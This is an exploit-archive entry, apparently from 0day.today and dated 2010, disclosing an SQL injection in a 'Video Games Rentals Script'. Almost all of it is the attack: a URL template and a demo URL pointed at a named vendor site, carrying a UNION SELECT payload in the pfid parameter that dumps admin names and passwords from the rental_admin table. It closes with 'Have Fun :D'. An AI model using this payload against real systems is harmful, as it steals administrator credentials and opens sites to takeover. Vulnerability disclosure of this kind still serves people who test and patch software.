id: 10851
date: 02/11/2010
title: Video Games Rentals Script SQL Injection Vulnerability
author: JaMba
cves: 

======================================================
Video Games Rentals Script SQL Injection Vulnerability
======================================================

# Exploit Title: video games rentals Script SQL injection Vulnerability
# Date: 11/02/2010
# Author: JaMbA
# Software Link: N/A
# Version: all version
# Tested on: Windows & Linux
# CVE : ()
 
:::::::::::::::::::::::::
 
Exploit Title : video games rentals Script SQL injection Vulnerability
 
Author : JaMbA
 
Script Site : www.commodityrentals.com
 
Version : All Versions
 
Tested on : Windows & Linux
 
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
:::::::::::::::::::::::::
 
=====================================Exploit===============
 
=========================
 
[ EXPL0!T ]
 
www.[Server}.com/[Path]/index.php?view=catalog&pfid=5[exploit code]&item_type=G
 
[ D3M0 ]
 
http://videogames.commodityrentals.com/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G
 
 
Have Fun :D
 
===========================================================



#  0day.today [2023-03-25]  #